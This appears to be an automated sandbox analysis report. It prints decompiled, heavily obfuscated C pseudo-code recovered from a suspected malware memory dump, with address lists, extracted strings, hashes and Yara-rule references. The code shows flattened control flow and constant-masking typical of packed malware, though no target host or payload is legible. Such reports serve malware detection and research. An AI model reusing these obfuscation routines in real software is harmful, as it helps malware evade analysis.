				_v1208 = _v1208 + 0x87f5;
				_v1208 = _v1208 ^ 0x079ed184;
				_v1128 = 0x5d27;
				_v1128 = _v1128 >> 0xc;
				_v1128 = _v1128 ^ 0x62edd6dc;
				_v1128 = _v1128 ^ 0x62ed9c54;
				_v1048 = 0x8776;
				_t413 = 0x1e;
				_t408 = _v1052;
				_v1048 = _v1048 * 0xc;
				_v1048 = _v1048 ^ 0x000959b7;
				_v1172 = 0x35cb;
				_t379 = _v1052;
				_v1172 = _v1172 / _t413;
				_v1172 = _v1172 | 0x92682d74;
				_v1172 = _v1172 ^ 0x346a72ec;
				_v1172 = _v1172 ^ 0xa6025f11;
				_v1188 = 0x8f0f;
				_t414 = 0x66;
				_t416 = _v1052;
				_v1188 = _v1188 / _t414;
				_v1188 = _v1188 << 5;
				_v1188 = _v1188 + 0x12e7;
				_v1188 = _v1188 ^ 0x00003fc5;
				_v1200 = 0x51b9;
				_v1200 = _v1200 | 0x17a7f9cb;
				_v1200 = _v1200 << 8;
				_v1200 = _v1200 | 0xe40f2208;
				_v1200 = _v1200 ^ 0xe7fffb08;
				_v1160 = 0x57cd;
				_v1160 = _v1160 + 0xffffc371;
				_v1160 = _v1160 ^ 0x54a04296;
				_v1160 = _v1160 ^ 0x54a059b8;
				while(1) {
					L1:
					_t399 = 0x5c;
					do {
						while(1) {
							L2:
							_t419 = _t380 - 0x21daabfe;
							if(_t419 > 0) {
								break;
							}
							if(_t419 == 0) {
								_t409 =  *0x25ca2c; // 0x6d8300
								_t410 = _t409 + 0x230;
								while(1) {
									__eflags =  *_t410 - _t399;
									if( *_t410 == _t399) {
										break;
									}
									_t410 = _t410 + 2;
									__eflags = _t410;
								}
								_t408 = _t410 + 2;
								_t380 = 0x3af90ff3;
								continue;
							}
							if(_t380 == 0x222340b) {
								E00245FB2(_v1208, _v1128, _t379);
								L27:
								return _v1052;
							}
							if(_t380 == 0x88778bb) {
								_t416 = E002454FE(_v1088, _v1160, _v1192, _v1064, _t380, _t380, _t408, _v1096, _v1200, _v1172, _v1132, _v1148, _v1044, _t380, _v1104, _t408,  &_v1040, _v1188, _t380, _t379, _v1140, _v1156, _t380, _v1180);
								_t417 =  &(_t417[0x16]);
								__eflags = _t416;
								if(_t416 == 0) {
									_t380 = 0x222340b;
								} else {
									_t380 = 0x212fea65;
									_v1052 = 1;
								}
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 == 0xeb1d0fe) {
								_push(_t380);
								_push(_t380);
								E0024C6C7(_v1196, _v1072,  &_v520, _t380, _v1112, _v1164, _v1168);
								_t417 =  &(_t417[7]);
								_t380 = 0x3304c1c2;
								while(1) {
									L1:
									_t399 = 0x5c;
									goto L2;
								}
							}
							if(_t380 != 0x212fea65) {
								goto L24;
							}
							E002542DA(_t416, _v1204, _v1176, _v1056, _t379, _v1124);
							_t417 =  &(_t417[4]);
							_t380 = 0x2e0be9f8;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x2e0be9f8;
						if(_t380 == 0x2e0be9f8) {
							E00245FB2(_v1060, _v1068, _t416);
							_t380 = 0x222340b;
							_t399 = 0x5c;
							goto L24;
						}
						__eflags = _t380 - 0x3304c1c2;
						if(__eflags == 0) {
							_push(_v1116);
							_t365 = E0025889D(0x25c930, _v1108, __eflags);
							_t367 =  *0x25ca2c; // 0x6d8300
							_t402 =  *0x25ca2c; // 0x6d8300
							E002429E3(_t402, 0x104, _t365, _v1144, _v1212, _v1092, _t367 + 0x230,  &_v1040, _v1184, _v1100);
							E00252025(_v1076, _t365, _v1084, _v1136);
							_t417 =  &(_t417[0xc]);
							_t380 = 0x21daabfe;
							while(1) {
								L1:
								_t399 = 0x5c;
								goto L2;
							}
						}
						__eflags = _t380 - 0x3af90ff3;
						if(_t380 != 0x3af90ff3) {
							goto L24;
						}
						_t379 = E00242959(_t380, _v1120, _v1080, _v1152, _v1048);
						_t417 =  &(_t417[4]);
						__eflags = _t379;
						if(_t379 == 0) {
							goto L27;
						}
						_t380 = 0x88778bb;
						goto L1;
						L24:
						__eflags = _t380 - 0x27fd7905;
					} while (_t380 != 0x27fd7905);
					goto L27;
				}
			}

0x0024d7eb
0x0024d7f1
0x0024d7fb
0x0024d800
0x0024d805
0x0024d80a
0x0024d812
0x0024d823
0x0024d827
0x0024d82b
0x0024d830
0x0024d838
0x0024d843
0x0024d84b
0x0024d856
0x0024d85e
0x0024d866
0x0024d86e
0x0024d876
0x0024d87e
0x0024d886
0x0024d88e
0x0024d896
0x0024d89e
0x0024d8a6
0x0024d8ae
0x0024d8b6
0x0024d8bb
0x0024d8c3
0x0024d8cb
0x0024d8d9
0x0024d8dc
0x0024d8e4
0x0024d8e8
0x0024d8f0
0x0024d8f8
0x0024d900
0x0024d905
0x0024d90a
0x0024d912
0x0024d91d
0x0024d928
0x0024d933
0x0024d93b
0x0024d943
0x0024d94b
0x0024d950
0x0024d958
0x0024d963
0x0024d96b
0x0024d976
0x0024d989
0x0024d990
0x0024d99b
0x0024d9a6
0x0024d9b1
0x0024d9bc
0x0024d9c4
0x0024d9cc
0x0024d9d4
0x0024d9dc
0x0024d9e4
0x0024d9e9
0x0024d9f1
0x0024d9fc
0x0024da07
0x0024da12
0x0024da1a
0x0024da22
0x0024da27
0x0024da2f
0x0024da3a
0x0024da42
0x0024da4f
0x0024da57
0x0024da5f
0x0024da64
0x0024da6c
0x0024da74
0x0024da7f
0x0024da86
0x0024da91
0x0024daa6
0x0024daa7
0x0024daae
0x0024dab9
0x0024dac1
0x0024dacb
0x0024dacf
0x0024dad7
0x0024dae4
0x0024daed
0x0024daf1
0x0024daf9
0x0024db04
0x0024db0f
0x0024db1a
0x0024db22
0x0024db2a
0x0024db32
0x0024db3a
0x0024db42
0x0024db4a
0x0024db52
0x0024db5a
0x0024db62
0x0024db6a
0x0024db72
0x0024db80
0x0024db84
0x0024db89
0x0024db8e
0x0024db96
0x0024db9e
0x0024dba6
0x0024dbae
0x0024dbb3
0x0024dbbb
0x0024dbc3
0x0024dbcb
0x0024dbd0
0x0024dbd8
0x0024dbe0
0x0024dbeb
0x0024dbf6
0x0024dc01
0x0024dc09
0x0024dc11
0x0024dc19
0x0024dc24
0x0024dc2f
0x0024dc3a
0x0024dc45
0x0024dc4d
0x0024dc58
0x0024dc65
0x0024dc69
0x0024dc6e
0x0024dc76
0x0024dc7e
0x0024dc86
0x0024dc8b
0x0024dc93
0x0024dc9b
0x0024dcb2
0x0024dcb5
0x0024dcbc
0x0024dcc3
0x0024dcce
0x0024dcde
0x0024dce5
0x0024dce9
0x0024dcf1
0x0024dcf9
0x0024dd01
0x0024dd0d
0x0024dd10
0x0024dd17
0x0024dd1b
0x0024dd20
0x0024dd28
0x0024dd30
0x0024dd38
0x0024dd40
0x0024dd45
0x0024dd4d
0x0024dd55
0x0024dd5d
0x0024dd65
0x0024dd6d
0x0024dd75
0x0024dd75
0x0024dd77
0x0024dd78
0x0024dd78
0x0024dd78
0x0024dd78
0x0024dd7e
0x00000000
0x00000000
0x0024dd84
0x0024de9f
0x0024dea5
0x0024deb0
0x0024deb0
0x0024deb3
0x00000000
0x00000000
0x0024dead
0x0024dead
0x0024dead
0x0024deb5
0x0024deb8
0x00000000
0x0024deb8
0x0024dd90
0x0024dfca
0x0024dfd0
0x0024dfe1
0x0024dfe1
0x0024dd9c
0x0024de77
0x0024de79
0x0024de7c
0x0024de7e
0x0024de95
0x0024de80
0x0024de80
0x0024de85
0x0024de85
0x0024dd75
0x0024dd75
0x0024dd77
0x00000000
0x0024dd77
0x0024dd75
0x0024dda4
0x0024ddd7
0x0024ddd8
0x0024ddfc
0x0024de01
0x0024de04
0x0024dd75
0x0024dd75
0x0024dd77
0x00000000
0x0024dd77
0x0024dd75
0x0024ddac
0x00000000
0x00000000
0x0024ddc8
0x0024ddcd
0x0024ddd0
0x0024dd75
0x0024dd75
0x0024dd77
0x00000000
0x0024dd77
0x0024dd75
0x0024dec2
0x0024dec8
0x0024dfa5
0x0024dfad
0x0024dfb2
0x00000000
0x0024dfb2
0x0024dece
0x0024ded4
0x0024df14
0x0024df21
0x0024df42
0x0024df5c
0x0024df68
0x0024df84
0x0024df89
0x0024df8c
0x0024dd75
0x0024dd75
0x0024dd77
0x00000000
0x0024dd77
0x0024dd75
0x0024ded6
0x0024dedc
0x00000000
0x00000000
0x0024defd
0x0024deff
0x0024df02
0x0024df04
0x00000000
0x00000000
0x0024df0a
0x00000000
0x0024dfb3
0x0024dfb3
0x0024dfb3
0x00000000
0x0024dfbf

Strings

), xrefs: 0024D80A
"%j(, xrefs: 0024DC11
6O, xrefs: 0024DA42
rj4, xrefs: 0024DCF1
@g, xrefs: 0024D84B
e/!, xrefs: 0024DE80
Kx, xrefs: 0024DC24
H, xrefs: 0024D7F1
Gm, xrefs: 0024D8BB
,, xrefs: 0024DAF9
M% , xrefs: 0024D990
#0, xrefs: 0024D9A6
yql, xrefs: 0024D830
x&, xrefs: 0024DA4F
m, xrefs: 0024DC4D
e/!, xrefs: 0024DDA6
'], xrefs: 0024DC7E

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "%j($#0$']$)$6O$@g$H$Kx$M% $e/!$e/!$x&$yql$,$Gm$m$rj4
API String ID: 0-131801274
Opcode ID: dd334fc3ca170f02087ade739037d5987a1292f86ff8bbcf52d28589b4646129
Instruction ID: c4243d17439b7af5764addd41e9e3298da31b37671755044be2b00b1539ff628
Opcode Fuzzy Hash: dd334fc3ca170f02087ade739037d5987a1292f86ff8bbcf52d28589b4646129
Instruction Fuzzy Hash: D6021271518380DFE369CF61C58AA5BBBE1FBC5708F10891DE2DA862A0D7B58958CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0024F98C, Relevance: 20.4, Strings: 16, Instructions: 390
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0024F98C(intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				intOrPtr _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				intOrPtr _v268;
				void* __ecx;
				void* _t344;
				void* _t374;
				signed int _t377;
				intOrPtr _t391;
				void* _t392;
				intOrPtr _t393;
				signed int _t395;
				intOrPtr _t396;
				signed int _t397;
				intOrPtr* _t401;
				intOrPtr _t403;
				intOrPtr* _t416;
				char* _t448;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				char* _t460;
				void* _t461;
				intOrPtr* _t468;
				void* _t470;
				void* _t472;

				_t401 = _a4;
				_push(_a16);
				_t468 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_t401);
				_push(__edx);
				E0024602B(_t344);
				_v180 = 0x2a54;
				_t470 =  &_v268 + 0x18;
				_v180 = _v180 ^ 0xdbb28899;
				_t403 = 0;
				_t461 = 0x405be48;
				_v268 = 0;
				_t450 = 0x55;
				_v180 = _v180 * 0x34;
				_v180 = _v180 ^ 0xa04911e4;
				_v164 = 0x788;
				_v164 = _v164 * 0x79;
				_v164 = _v164 ^ 0x00038f4a;
				_v260 = 0xdd03;
				_v260 = _v260 ^ 0x82285f25;
				_v260 = _v260 >> 7;
				_v260 = _v260 << 4;
				_v260 = _v260 ^ 0x104552fc;
				_v132 = 0x81fa;
				_v132 = _v132 | 0x4b6553e1;
				_v132 = _v132 ^ 0x4b658f00;
				_v208 = 0xbd69;
				_t451 = 0x73;
				_v208 = _v208 / _t450;
				_v208 = _v208 + 0x56ba;
				_v208 = _v208 ^ 0x000029ec;
				_v156 = 0x625a;
				_v156 = _v156 + 0xffff65b2;
				_v156 = _v156 ^ 0xffffa807;
				_v176 = 0xc378;
				_v176 = _v176 >> 1;
				_v176 = _v176 + 0x1919;
				_v176 = _v176 ^ 0x00004408;
				_v228 = 0xbfad;
				_v228 = _v228 + 0xffff004b;
				_v228 = _v228 / _t451;
				_t452 = 0x16;
				_v228 = _v228 / _t452;
				_v228 = _v228 ^ 0x0019c242;
				_v264 = 0x218a;
				_v264 = _v264 | 0xaefe0d97;
				_v264 = _v264 + 0x77f0;
				_v264 = _v264 + 0xffffbecb;
				_v264 = _v264 ^ 0xaefe1c0e;
				_v152 = 0x1773;
				_v152 = _v152 + 0x7c73;
				_v152 = _v152 ^ 0x000090c4;
				_v140 = 0xfcb3;
				_v140 = _v140 + 0xffff1dd8;
				_v140 = _v140 ^ 0x00004a86;
				_v252 = 0x9e2f;
				_t453 = 9;
				_v252 = _v252 / _t453;
				_v252 = _v252 << 0xc;
				_v252 = _v252 + 0x6e7b;
				_v252 = _v252 ^ 0x01198ad6;
				_v136 = 0x978d;
				_v136 = _v136 << 0xb;
				_v136 = _v136 ^ 0x04bc6438;
				_v144 = 0xf0b5;
				_t454 = 0x79;
				_v144 = _v144 * 0x51;
				_v144 = _v144 ^ 0x004c2c51;
				_v224 = 0xa482;
				_v224 = _v224 ^ 0xc585cea3;
				_v224 = _v224 / _t454;
				_v224 = _v224 ^ 0x01a18743;
				_v148 = 0xd0a0;
				_v148 = _v148 >> 1;
				_v148 = _v148 ^ 0x000025e7;
				_v232 = 0xead1;
				_v232 = _v232 ^ 0xc3cfbc77;
				_v232 = _v232 | 0xf3c428cf;
				_v232 = _v232 + 0xffff938a;
				_v232 = _v232 ^ 0xf3cf35e7;
				_v160 = 0xb488;
				_v160 = _v160 + 0xf6e2;
				_v160 = _v160 ^ 0x0001c37e;
				_v212 = 0xc903;
				_t455 = 0x1e;
				_v212 = _v212 / _t455;
				_v212 = _v212 ^ 0xfd3886ab;
				_v212 = _v212 ^ 0xfd38fa88;
				_v196 = 0xdd05;
				_v196 = _v196 << 5;
				_v196 = _v196 + 0xdc4b;
				_v196 = _v196 ^ 0x001c7bd6;
				_v200 = 0x4db0;
				_v200 = _v200 ^ 0x1a7afaec;
				_v200 = _v200 >> 8;
				_v200 = _v200 ^ 0x001a5e83;
				_v240 = 0x9d3f;
				_v240 = _v240 >> 8;
				_v240 = _v240 << 9;
				_v240 = _v240 + 0x917a;
				_v240 = _v240 ^ 0x0001a611;
				_v256 = 0x4a86;
				_v256 = _v256 >> 0xd;
				_t456 = 0x55;
				_v256 = _v256 * 0x35;
				_v256 = _v256 + 0xffffab30;
				_v256 = _v256 ^ 0xffffb251;
				_v204 = 0x386;
				_v204 = _v204 / _t456;
				_v204 = _v204 ^ 0xc8309f8e;
				_v204 = _v204 ^ 0xc830cb09;
				_v172 = 0x8769;
				_v172 = _v172 >> 0xe;
				_v172 = _v172 ^ 0x00003b2d;
				_v244 = 0x2b5b;
				_v244 = _v244 + 0xb0ca;
				_v244 = _v244 + 0xd805;
				_v244 = _v244 << 2;
				_v244 = _v244 ^ 0x0006bd06;
				_v184 = 0x1527;
				_v184 = _v184 | 0xeeea078d;
				_t457 = 0x28;
				_v184 = _v184 / _t457;
				_v184 = _v184 ^ 0x05f92fca;
				_v192 = 0x11fc;
				_t458 = 0x16;
				_v192 = _v192 / _t458;
				_v192 = _v192 ^ 0x8895e54e;
				_v192 = _v192 ^ 0x8895ebcd;
				_v168 = 0xe011;
				_v168 = _v168 + 0x4c50;
				_v168 = _v168 ^ 0x0001058b;
				_v216 = 0xf07;
				_t459 = 0x32;
				_v216 = _v216 * 0x36;
				_v216 = _v216 >> 2;
				_v216 = _v216 ^ 0x00008949;
				_v248 = 0xde23;
				_v248 = _v248 + 0xecd9;
				_v248 = _v248 << 0xd;
				_v248 = _v248 ^ 0x1d8b17f5;
				_v248 = _v248 ^ 0x24d4a8d4;
				_v220 = 0x3854;
				_v220 = _v220 | 0x09b0f0f7;
				_v220 = _v220 + 0xe63e;
				_v220 = _v220 ^ 0x09b1b8f3;
				_v188 = 0x295e;
				_v188 = _v188 * 0x23;
				_v188 = _v188 / _t459;
				_v188 = _v188 ^ 0x00001cf4;
				_t460 = _v124;
				while(1) {
					L1:
					_t441 = _v236;
					while(1) {
						L2:
						_t472 = _t461 - 0x299f8b6c;
						if(_t472 <= 0) {
							break;
						}
						if(_t461 == 0x2e2d51e6) {
							_v124 = 0x14;
							_t374 = E0024F39F(_v244, _v128, _t460 + 0x60,  &_v124, _v184, _v192, _v164, _t403, _v168);
							_t403 = _v268;
							_t470 = _t470 + 0x1c;
							_t441 = _v236;
							if(_t374 == 0) {
								continue;
							}
							_t461 = 0x8f3e942;
							_t403 = 1;
							_v268 = 1;
							L29:
							if(_t461 == 0x33ec2607) {
								L33:
								return _v268;
							}
							while(1) {
								L1:
								_t441 = _v236;
								goto L2;
							}
						}
						if(_t461 == 0x2e332bc4) {
							E00252674(_v252, _v136, _a4, _t441, _v144, _v224,  *_t468);
							_t470 = _t470 + 0x14;
							_t461 = 0x2452d659;
							L9:
							_t403 = _v268;
							goto L1;
						}
						if(_t461 == 0x2efa85f7) {
							_t377 = _a4 + 1;
							if((_t377 & 0x0000000f) != 0) {
								_t377 = (_t377 & 0xfffffff0) + 0x10;
							}
							 *((intOrPtr*)(_t401 + 4)) = _t377 + 0x74;
							_push(_t403);
							_push(_t403);
							_t460 = E00248736( *((intOrPtr*)(_t401 + 4)));
							 *_t401 = _t460;
							if(_t460 == 0) {
								goto L33;
							} else {
								_t317 = _t460 + 0x74; // 0x74
								_t441 = _t317;
								_v116 = _a4;
								_t461 = 0x332cf2c2;
								_t403 = _v268;
								_v236 = _t317;
								_v120 =  *((intOrPtr*)(_t401 + 4)) - 0x74;
								continue;
							}
						}
						if(_t461 != 0x332cf2c2) {
							goto L29;
						}
						_t396 =  *0x25ca20; // 0x0
						_t397 = E00251B49( &_v128, _v264, _t403,  *((intOrPtr*)(_t396 + 0x2c)), _t403, _v152, _v140);
						_t470 = _t470 + 0x14;
						asm("sbb esi, esi");
						_t461 = ( ~_t397 & 0x0493a058) + 0x299f8b6c;
						goto L9;
					}
					if(_t472 == 0) {
						if(_t403 == 0) {
							E0024F536(_v156, _v176, _v228,  *_t401);
						}
						goto L33;
					}
					if(_t461 == 0x405be48) {
						_t461 = 0x2efa85f7;
						goto L2;
					}
					if(_t461 == 0x8f3e942) {
						_push(_t403);
						_push(_t403);
						E00245F43(_t403, _v128);
						_t461 = 0x299f8b6c;
						goto L9;
					}
					if(_t461 == 0x1e33600c) {
						_v112 = 0x6c;
						_t391 =  *0x25ca20; // 0x0
						_t392 = E00248010( &_v108,  &_v112, _v188, _v240,  *((intOrPtr*)(_t391 + 0x24)),  *((intOrPtr*)(_t391 + 0x10)), _v256, _v204, _v180, _v172);
						_t470 = _t470 + 0x20;
						if(_t392 == 0) {
							_t461 = 0x8f3e942;
							goto L9;
						}
						_t416 =  &_v1;
						_t448 = _t460;
						do {
							 *_t448 =  *_t416;
							_t448 = _t448 + 1;
							_t416 = _t416 - 1;
						} while (_t416 >=  &_v96);
						_t461 = 0x2e2d51e6;
						goto L9;
					}
					if(_t461 != 0x2452d659) {
						goto L29;
					}
					_t393 =  *0x25ca20; // 0x0
					_t395 = E00250A3B(_v120, _v128, _v148, _v232, _v160, _t403,  &_v116, _v212, _v196, _t441, _v200, _t403,  *((intOrPtr*)(_t393 + 0x10)));
					_t470 = _t470 + 0x2c;
					asm("sbb esi, esi");
					_t461 = ( ~_t395 & 0x153f76ca) + 0x8f3e942;
					goto L9;
				}
			}

0x0024f993
0x0024f99d
0x0024f9a4
0x0024f9a6
0x0024f9ad
0x0024f9b4
0x0024f9b5
0x0024f9b7
0x0024f9bc
0x0024f9c7
0x0024f9ca
0x0024f9d9
0x0024f9db
0x0024f9e0
0x0024f9e6
0x0024f9e9
0x0024f9ed
0x0024f9f5
0x0024fa02
0x0024fa06
0x0024fa0e
0x0024fa16
0x0024fa1e
0x0024fa23
0x0024fa28
0x0024fa30
0x0024fa3b
0x0024fa46
0x0024fa51
0x0024fa5f
0x0024fa60
0x0024fa66
0x0024fa6e
0x0024fa76
0x0024fa81
0x0024fa8c
0x0024fa97
0x0024fa9f
0x0024faa3
0x0024faab
0x0024fab3
0x0024fabb
0x0024facb
0x0024fad5
0x0024fada
0x0024fade
0x0024fae6
0x0024faee
0x0024faf6
0x0024fafe
0x0024fb06
0x0024fb0e
0x0024fb19
0x0024fb24
0x0024fb2f
0x0024fb3a
0x0024fb45
0x0024fb52
0x0024fb5e
0x0024fb63
0x0024fb69
0x0024fb6e
0x0024fb76
0x0024fb7e
0x0024fb89
0x0024fb91
0x0024fb9c
0x0024fbaf
0x0024fbb2
0x0024fbb9
0x0024fbc4
0x0024fbcc
0x0024fbdc
0x0024fbe0
0x0024fbe8
0x0024fbf3
0x0024fbfa
0x0024fc05
0x0024fc0d
0x0024fc15
0x0024fc1d
0x0024fc25
0x0024fc2d
0x0024fc38
0x0024fc43
0x0024fc4e
0x0024fc5a
0x0024fc5f
0x0024fc65
0x0024fc6d
0x0024fc75
0x0024fc7d
0x0024fc82
0x0024fc8a
0x0024fc92
0x0024fc9a
0x0024fca2
0x0024fca7
0x0024fcaf
0x0024fcb7
0x0024fcbc
0x0024fcc1
0x0024fcc9
0x0024fcd1
0x0024fcd9
0x0024fce3
0x0024fce4
0x0024fce8
0x0024fcf0
0x0024fcf8
0x0024fd06
0x0024fd0a
0x0024fd12
0x0024fd1a
0x0024fd22
0x0024fd27
0x0024fd2f
0x0024fd37
0x0024fd3f
0x0024fd47
0x0024fd4c
0x0024fd54
0x0024fd5c
0x0024fd6c
0x0024fd71
0x0024fd77
0x0024fd7f
0x0024fd8b
0x0024fd90
0x0024fd96
0x0024fd9e
0x0024fda6
0x0024fdae
0x0024fdb6
0x0024fdbe
0x0024fdcb
0x0024fdcc
0x0024fdd0
0x0024fdd5
0x0024fddd
0x0024fde5
0x0024fded
0x0024fdf2
0x0024fdfa
0x0024fe02
0x0024fe0a
0x0024fe12
0x0024fe1a
0x0024fe22
0x0024fe2f
0x0024fe39
0x0024fe3d
0x0024fe45
0x0024fe4c
0x0024fe4c
0x0024fe4c
0x0024fe50
0x0024fe50
0x0024fe50
0x0024fe56
0x00000000
0x00000000
0x0024ff96
0x0025009f
0x002500ca
0x002500cf
0x002500d3
0x002500d6
0x002500dc
0x00000000
0x00000000
0x002500e4
0x002500e9
0x002500ea
0x002500ee
0x002500f4
0x00250117
0x00250125
0x00250125
0x0024fe4c
0x0024fe4c
0x0024fe4c
0x00000000
0x0024fe4c
0x0024fe4c
0x0024ffa2
0x00250082
0x00250087
0x0025008a
0x0024fee7
0x0024fee7
0x00000000
0x0024fee7
0x0024ffae
0x00250001
0x00250004
0x00250009
0x00250009
0x0025000f
0x00250021
0x00250022
0x0025002b
0x0025002d
0x00250033
0x00000000
0x00250039
0x0025003c
0x0025003c
0x00250045
0x0025004c
0x00250051
0x00250055
0x00250059
0x00000000
0x00250059
0x00250033
0x0024ffb6
0x00000000
0x00000000
0x0024ffca
0x0024ffdf
0x0024ffe4
0x0024ffeb
0x0024fff3
0x00000000
0x0024fff3
0x0024fe5c
0x002500fd
0x00250110
0x00250116
0x00000000
0x002500fd
0x0024fe68
0x0024ff86
0x00000000
0x0024ff86
0x0024fe74
0x0024ff73
0x0024ff74
0x0024ff75
0x0024ff7c
0x00000000
0x0024ff7c
0x0024fe80
0x0024fef4
0x0024ff19
0x0024ff2c
0x0024ff31
0x0024ff36
0x0024ff59
0x00000000
0x0024ff59
0x0024ff38
0x0024ff3f
0x0024ff41
0x0024ff43
0x0024ff45
0x0024ff46
0x0024ff4e
0x0024ff52
0x00000000
0x0024ff52
0x0024fe88
0x00000000
0x00000000
0x0024fe8e
0x0024fecd
0x0024fed2
0x0024fed9
0x0024fee1
0x00000000
0x0024fee1

Strings

SeK, xrefs: 0024FA3B
K, xrefs: 0024FABB
), xrefs: 0024FA6E
-;, xrefs: 0024FD27
Q-., xrefs: 0024FF52
PL, xrefs: 0024FDAE
[+, xrefs: 0024FD2F
{n, xrefs: 0024FB6E
Zb, xrefs: 0024FA76
s|, xrefs: 0024FB19
Q,L, xrefs: 0024FBB9
%, xrefs: 0024FBFA
>, xrefs: 0024FE12
l, xrefs: 0024FEF4
^), xrefs: 0024FE22
Q-., xrefs: 0024FF90

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: -;$>$K$PL$Q,L$Zb$[+$^)$l$s|${n$%$)$Q-.$Q-.$SeK
API String ID: 0-11970308
Opcode ID: fd9420bb2fc36f2248fbf5f6c6d8adf484dcf1456411f097187bca4ab3d98c4a
Instruction ID: cfc609525313bec8f1e4f2a11f3488f0f75be7d90685bd6ab95f0f204ede9f34
Opcode Fuzzy Hash: fd9420bb2fc36f2248fbf5f6c6d8adf484dcf1456411f097187bca4ab3d98c4a
Instruction Fuzzy Hash: 131245725183808FE368CF25C989A4FBBF1BBC4314F148A1DF6D9862A0D7B59959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00241CFA, Relevance: 19.3, Strings: 15, Instructions: 503
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00241CFA(void* __edx, intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				unsigned int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				void* __ecx;
				void* _t496;
				void* _t539;
				intOrPtr _t544;
				intOrPtr _t546;
				signed int _t548;
				signed int _t551;
				intOrPtr _t552;
				intOrPtr _t554;
				signed int _t555;
				intOrPtr _t562;
				intOrPtr _t572;
				void* _t574;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t583;
				signed int _t584;
				signed int _t585;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				intOrPtr _t591;
				intOrPtr _t592;
				void* _t597;
				intOrPtr _t599;
				intOrPtr _t635;
				intOrPtr _t639;
				void* _t641;
				signed int* _t653;
				void* _t656;

				_t575 = _a4;
				_push(_a4);
				_push(__edx);
				E0024602B(_t496);
				_v12 = 0x36bdff;
				_t653 =  &(( &_v228)[3]);
				_v8 = 0x3ff2a1;
				_t639 = 0;
				_v4 = 0;
				_v132 = 0xebdb;
				_t641 = 0x15e50797;
				_t577 = 0x54;
				_v132 = _v132 / _t577;
				_v132 = _v132 | 0x22f60655;
				_v132 = _v132 ^ 0x22f660d1;
				_v120 = 0xef02;
				_v120 = _v120 + 0xffff4354;
				_v120 = _v120 + 0xfbd6;
				_v120 = _v120 ^ 0x0001ae28;
				_v52 = 0x7417;
				_v52 = _v52 + 0x1179;
				_v52 = _v52 ^ 0x00000590;
				_v48 = 0x8f30;
				_v48 = _v48 >> 0xf;
				_v64 = 0xc7cd;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x0c7cd040;
				_v140 = 0xc967;
				_v140 = _v140 << 0xb;
				_v140 = _v140 | 0xe06bf9c9;
				_v140 = _v140 ^ 0x166bf9c9;
				_v196 = 0x461e;
				_v196 = _v196 | 0x6b692bd6;
				_v196 = _v196 + 0xc0cf;
				_v196 = _v196 + 0xffff0de4;
				_v196 = _v196 ^ 0x6b6977c5;
				_v180 = 0xfff7;
				_t578 = 0x59;
				_v180 = _v180 / _t578;
				_t579 = 0x4d;
				_v180 = _v180 * 0x18;
				_v180 = _v180 | 0x58a6a9da;
				_v180 = _v180 ^ 0x58a6c249;
				_v128 = 0x9f16;
				_v128 = _v128 ^ 0xdade8ffa;
				_v128 = _v128 ^ 0x4c90ffe3;
				_v128 = _v128 ^ 0x964ece00;
				_v92 = 0xcecd;
				_v92 = _v92 + 0x8237;
				_v92 = _v92 / _t579;
				_v92 = _v92 ^ 0x00006f99;
				_v100 = 0x1088;
				_v100 = _v100 << 8;
				_v100 = _v100 << 3;
